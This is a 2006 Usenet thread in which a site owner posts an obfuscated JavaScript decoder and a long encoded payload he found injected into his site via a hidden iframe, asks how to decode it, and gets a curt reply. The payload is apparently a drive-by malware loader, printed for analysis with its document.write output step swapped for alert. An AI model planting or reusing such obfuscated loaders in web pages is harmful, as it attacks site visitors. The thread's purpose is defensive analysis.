Decoder for obfuscated code?

[zsisco]

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}


dc("a_HDcBY@icbCvFIEjgIE0R6BvkmDdZ3@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xkrBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@mlmDccM@vRaPW_mDaOn4oOnEooYAm4L@v4rOvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYRqB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bCIFMDmg3@QsXRdgIRdCrRwWqQj5qBn4rO9s2@nFIEol3@pRI6mg3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaPedLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oOMQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTFV@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSScqQm8l74c25R4kQoxLTZBbCjOb48zb@JwW@HF798NrQe9Izi5lRewq7ew6Se5zznOnQmsL4ndmQR4FzodLzzoVCj9nQTBb@jWzzjGrQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbCjObQWxa@JwW@jGrQENrRqwaSHFkQeoG3181Se9XSScaB18l7ndmCmzV4odLzzBbCj9YQGBb@jxW@TFbPXNM7exaBHw11ew671s1Se9XSCNnQmo69ndH7jCb4oda8qpWPj5VQGBb@JkGz1FbP1zkRqwaBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4oxLTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQqpqQjdmQR4V7oda8qxaPj5V48zb@JwW@HFbQ4gG3qwLzhG21eo19e4zSiGF2jdqQmoqQjdmQ8zkQoda8qxaPj5kQYzb@jGkRTFbQ4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmCmVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiGk6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@jWzzTFrQt1F7exLzi5lRewq7ew6Se9XSjdqQmsa@jdmQ8zV4ox66qpWPj9nQYzb@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@JwW@TFrQENrQexaSHw11eFl7e81Se9XSjdqQ1wq8kd25R4FzoG21QBbCj9YQTFV@jxW@TFrQthlRqwaBhG21eFl7e81Sj_79CNnQ1sqBkdmCC4V7oG219oWPm4V4UBb@SwqRTF794FmRq8Izi5qQewq7e81Sj_r6jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@JwW@TFrQthlRqwaBhGmReF1714zSjxVSScqQm8l7nd25R4V4oxLTzBbCj5kQYzb@JwW@HF794FmRqwLzjtlReRYBsw6Se5k6CNYB1sa74cH7mzkQoda8qpWPj9Y4UFV@JkGzjGrQtGmRqwaSHVzReFl7e81SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnTTzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzzzoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nNGzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJoWPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFAroIzMF2984z9wGVBJBz2GkmzFkbPe97Umpn8cll3Lgk6x8k2xCMNM1_Op_HDcBY@iFq")

</script>

 

[zsisco]

The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Anyone have a quick way to decode the following script?

It seems to be malware and was linked into my site via a hidden iframe.


I want to take a look at the code.

Thanks!


<script language=JavaScript>

function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,

t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);

for(j=Math.ceil(l/b);j>0;j--) {

r='';
for(i=Math.min(l,b);i>0;i--,l--)

{
w |= (t[x.charCodeAt(p++)-48]) << s;

if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}

alert("LINE: " + r);
}
}


dc("a_HDcBY@icbCvFIEjgIE0R6BvkmDdZ3@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHNTNY5skkDNzVNAJY6xkrBe4GAq1rEc9kAKkIUWlmDccM2p46AvVXTnBnOxpMNwJ3@mlmDccM@vRaPW_mDaOn4oOnEooYAm4L@v4rOvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3CywY8KkYRqB1St8nDcgWAm_mDnC7UcxqQnOaOf9a9mt2SnFYE08H5w8bCIFMDmg3@QsXRdgIRfCrRwWqQjCbOah6Pa8bAoC3CywY8KkYRqB1St8nDcgWAm_mDlWqRnl7PjxqRaOaRvVHEjRnEosH@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQiWqRas2SnFYE08H5w8bCIFMDmg3@QsXRdgIRdCrRwWqQj5qBn4rO9s2@nFIEol3@pRI6mg3@OJYE08bR9J3UmWqQj17Pjl6Rcx6QnC7OZh6Qq9M2pkbRgxaPedLRc9aPnC7OZ9aS9J3UcxqQn5q90kmDq8rBnBMNb4qKFWXRx1l5XNYPW97StG2SBk29zVVQ8NW3npHzAgl7ot6Sj_l2rFmCLBb@ro34ZFbQgw11JsX7PoIQGFVNod2RidaBjOYADFkDtWFz9RI4oOMQxcWCmNnQCBM4L4WAxBbBhpVBT8YCjpFQGFV@r83D1FbPXNM7exaBHw11eF171w6Sj_79nOnQq912kd25UcX4oG22qpVCj9YQTFV@jlGzTFrQthlRqwaBhG21eFl7es1SjxVSnOnQmo694cmQUcX7ot61QoVCj5V44wa@jWzDTFrQENrRqwaShxqQew671s1Se9XSScqQm8l74c25R4kQoxLTZBbCjOb48zb@JwW@HF798NrQe9Izi5lRewq7ew6Se5zznOnQmsL4ndmQR4FzodLzzoVCj9nQTBb@jWzzjGrQthlRqwLzHVzRewq7e81Sj1zzjdqQ1wq8kd25R4FzoG21ZBbCjObQWxa@JwW@jGrQENrRqwaSHFkQeoG3181Se9XSScaB18l7ndmCmzV4odLzzBbCj9YQGBb@jxW@TFbPXNM7exaBHw11ew671s1Se9XSCNnQmo69ndH7jCb4oda8qpWPj5VQGBb@JkGz1FbP1zkRqwaBHFkQeF1714zSe5zzCNnQq911jdH7jCb4ot62qpVCj5VQTFV@JkGz1F794glRqwaBit11ewq7es1Sj_r6nOnQmo694c25UcX4oxLTZoVCj5VQnzb@roFzTF794FmRqwLzjtlReRYBsw6SZVVSCNnQqpqQjdmQR4V7oda8qxaPj5V48zb@JwW@HFbQ4gG3qwLzhG21eo19e4zSiGF2jdqQmoqQjdmQ8zkQoda8qxaPj5kQYzb@jGkRTFbQ4gG3q8IzHVzReRYBsw6Sj_79nOYB1sa74c25R4Fzot62qCbCj5VQGBb@jWzD1FrQt1kRqwaBi5lRewq7e4zSe5zzCNnQmwq8kdmCmVnQoxLTZBbCj5VQWxa@S83DjG794FmRqwaSh93ReoWBsw6SiGk6CNYBP8l74c25UcX4oda8qxaPj9nQTBb@jWzzTFrQt1F7exLzi5lRewq7ew6Se9XSjdqQmsa@jdmQ8zV4ox66qpWPj9nQYzb@jlGzTFbPXNrQexLQHw11ew62zw6Sj_7zCNnQmo69ndH7jCb4oda8qpWPm4V4UBb@S83zTFrQENM7exaBjC2Rew671s1Se9XSjdqQh9l74cmQ8zkQoxLTzoVCj9IQZBb@ZkMzTFbP1zF3qwLzjC2Rew61nt1SZFz9nOnQ1sqBkd25R4FzoG21QBbCjOb4UFV@JwW@TFrQENrQexaSHw11eFl7e81Se9XSjdqQ1wq8kd25R4FzoG21QBbCj9YQTFV@jxW@TFrQthlRqwaBhG21eFl7e81Sj_79CNnQ1sqBkdmCC4V7oG219oWPm4V4UBb@SwqRTF794FmRq8Izi5qQewq7e81Sj_r6jdqQm8l74c25UcX7oxLTQoVCj9IQZBb@jWzzTFbP1zF3qwLzi5lReFl7e4zSe9XSjdqQmwa7nd25UcX4oxLTzBbCj5kQYzb@JwW@TFrQthlRqwaBhGmReF1714zSjxVSScqQm8l7nd25R4V4oxLTzBbCj5kQYzb@JwW@HF794FmRqwLzjtlReRYBsw6Se5k6CNYB1sa74cH7mzkQoda8qpWPj9Y4UFV@JkGzjGrQtGmRqwaSHVzReFl7e81SiGk6nSG7NsaPLoHQYzkQC8IzAFW7jNlQTJY@FcLNSBMEONnTTzrDHw1RNFl7eJ1AUwV7jGk8pca7tC79TwmEh5GzZoq7khY4Uz76JwW@mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmRTF794Zz5MBrDHFzzzoL4opGQjWn2JslALo694cmCmVIzoG219FW3jpGQhVn2iwW@eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG794Zz5D8r2hp2DAsm7ecm3UVWShtW6PBMNr4W4ZFbBet11kxaPj5VQqNW7gc6CSBb@Ogz5TwX5jtW6Xt2U18LQ34zzJkWBPwq8kdmCmVnEmtkRAFW7eNGQZFV@r83D0oa7NN79nNGzn5W5Pk29jwIQG4zzrsqRv8l7kW15Uc23gw6D8B71Yo24UBb@S83D0Z19jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGTAFW7jNlQTcG6ikMzXpqz1slQRo1RndHTJoWPWx6SZFF2JskQmp69Ssl64BMzCVV@tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFAroIzMF2984z9wGVBJBz2GkmzFkbPe97Umpn8cll3Lgk6x8k2xCMNM1_Op_HDcBY@iFq")

</script>

 

[Dr John Stockton]

JRS: In article <[email protected]>,
dated Fri, 22 Sep 2006 13:59:01 remote, seen in
news:comp.lang.javascript, (e-mail address removed) posted :

Lines: 61

The line

alert("LINE: " + r);

was

document.write(r);

originally. Did not want anyone to run it!

Do not top-post or over-quote - see FAQ.

You can run it yourself and read the alert; or you can safely use a
textarea to display r. Then you will be able to see what it decodes to.


It's a good idea to read the newsgroup and its FAQ.

 

[zsisco]

Well genius if you had run it you would have seen that is not the
answer. Jeez, anyone else besides the good doctor have any ideas?